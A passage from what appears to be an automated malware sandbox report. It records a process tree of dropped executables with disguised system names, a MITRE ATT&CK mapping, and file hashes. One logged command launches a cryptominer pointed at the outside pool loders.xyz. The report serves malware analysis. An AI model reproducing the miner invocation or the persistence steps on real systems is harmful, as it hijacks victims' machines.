                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:1032
                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:5232
                                                                                                                                                                                                                                                              • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:3108
                                                                                                                                                                                                                                                              • C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                                                C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                PID:4204
                                                                                                                                                                                                                                                                • C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                  C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:3024
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4828
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /query /fo list
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:4880
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:1672
                                                                                                                                                                                                                                                                        • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                                                                          ipconfig /flushdns
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Gathers network information
                                                                                                                                                                                                                                                                          PID:5232
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:2504
                                                                                                                                                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                            gpupdate /force
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:5196
                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\audiodg.exe
                                                                                                                                                                                                                                                                            C:\ProgramData\WindowsTask\audiodg.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:5776
                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                                                                                                                                                                                                                                                            C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            PID:5808
                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k networkservice -s TermService
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:8
                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:4392
                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            PID:5428
                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            PID:5588
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:5972
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:6108
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:4924
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:5256
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:5364
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:5444
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:5124
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:5112
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:5552
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:4860
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:200
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:4932
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:3972
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:4332
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:5948

                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                          Execution

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Command-Line Interface

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1059

                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                          T1031

                                                                                                                                                                                                                                                                          Hidden Files and Directories

                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                          T1158

                                                                                                                                                                                                                                                                          Account Manipulation

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1098

                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                                                                          Winlogon Helper DLL

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1004

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                          6
                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                          Disabling Security Tools

                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                          T1089

                                                                                                                                                                                                                                                                          Hidden Files and Directories

                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                          T1158

                                                                                                                                                                                                                                                                          Impair Defenses

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1562

                                                                                                                                                                                                                                                                          File Permissions Modification

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1222

                                                                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                          T1081

                                                                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                                                                          Impact

                                                                                                                                                                                                                                                                          Service Stop

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1489

                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                          • C:\Program Files\Common Files\System\iediagcmd.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\Microsoft\Check\Check.txt
                                                                                                                                                                                                                                                                          • C:\ProgramData\Microsoft\Intel\R8.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\Microsoft\Intel\R8.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\Microsoft\Intel\wini.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\Microsoft\Intel\wini.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RDPWinst.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RDPWinst.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RDPWinst.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            191f67bf26f68cef47359b43facfa089

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            94529e37aa179e44e22e9ccd6ee0de8a49a8f2fc

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            2144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            7d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b

                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            191f67bf26f68cef47359b43facfa089

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            94529e37aa179e44e22e9ccd6ee0de8a49a8f2fc

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            2144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            7d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b

                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\audiodg.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\audiodg.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\azur.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            bfa81a720e99d6238bc6327ab68956d9

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            c7039fadffccb79534a1bf547a73500298a36fa0

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\azur.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\system.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            49e31c4bcd9f86ba897dc7e64176dc50

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            cbf0134bd25fd631c3baae23b9e5c79dffef870a

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\system.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            49e31c4bcd9f86ba897dc7e64176dc50

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            cbf0134bd25fd631c3baae23b9e5c79dffef870a

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\update.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            c830b8a074455cc0777ed5bc0bfd2678

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            bff2a96c092f8c5620a4d4621343594cd8892615

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\update.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            c830b8a074455cc0777ed5bc0bfd2678

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            bff2a96c092f8c5620a4d4621343594cd8892615

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            ec0f9398d8017767f86a4d0e74225506

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\install.vbs
                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\reg1.reg
                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\reg2.reg
                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            37a8802017a212bb7f5255abc7857969

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            cb10c0d343c54538d12db8ed664d0a1fa35b6109

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            37a8802017a212bb7f5255abc7857969

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            cb10c0d343c54538d12db8ed664d0a1fa35b6109

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            37a8802017a212bb7f5255abc7857969

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            cb10c0d343c54538d12db8ed664d0a1fa35b6109

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            37a8802017a212bb7f5255abc7857969

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            cb10c0d343c54538d12db8ed664d0a1fa35b6109

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            37a8802017a212bb7f5255abc7857969

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            cb10c0d343c54538d12db8ed664d0a1fa35b6109

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\vp8decoder.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            88318158527985702f61d169434a4940

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            3cc751ba256b5727eb0713aad6f554ff1e7bca57

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\vp8encoder.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            6298c0af3d1d563834a218a9cc9f54bd

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            0185cd591e454ed072e5a5077b25c612f6849dc9

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\winit.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\winit.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\install\cheat.exe
                                                                                                                                                                                                                                                                          • C:\ProgramData\install\utorrent.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            8590e82b692b429189d114dda535b6e8

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            5d527ad806ac740e2e2769f149270be6a722e155

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            af5d5c340c063e7f4a70bd55ce1634b910e5d43d59c1008b4ad38d2c52c8db7d

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            0747d770a6e5cc1fcd0b3ed060eaaa37531c9483620253aec8fc8fb472435d14b235e10339e52a41a563a0bc9af4e109940a71bb4e08495563ef7c581e962fda

                                                                                                                                                                                                                                                                          • C:\Programdata\Install\del.bat
                                                                                                                                                                                                                                                                          • C:\Programdata\Install\utorrent.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            8590e82b692b429189d114dda535b6e8

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            5d527ad806ac740e2e2769f149270be6a722e155

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            af5d5c340c063e7f4a70bd55ce1634b910e5d43d59c1008b4ad38d2c52c8db7d

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            0747d770a6e5cc1fcd0b3ed060eaaa37531c9483620253aec8fc8fb472435d14b235e10339e52a41a563a0bc9af4e109940a71bb4e08495563ef7c581e962fda

                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                          • C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            ec0f9398d8017767f86a4d0e74225506

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

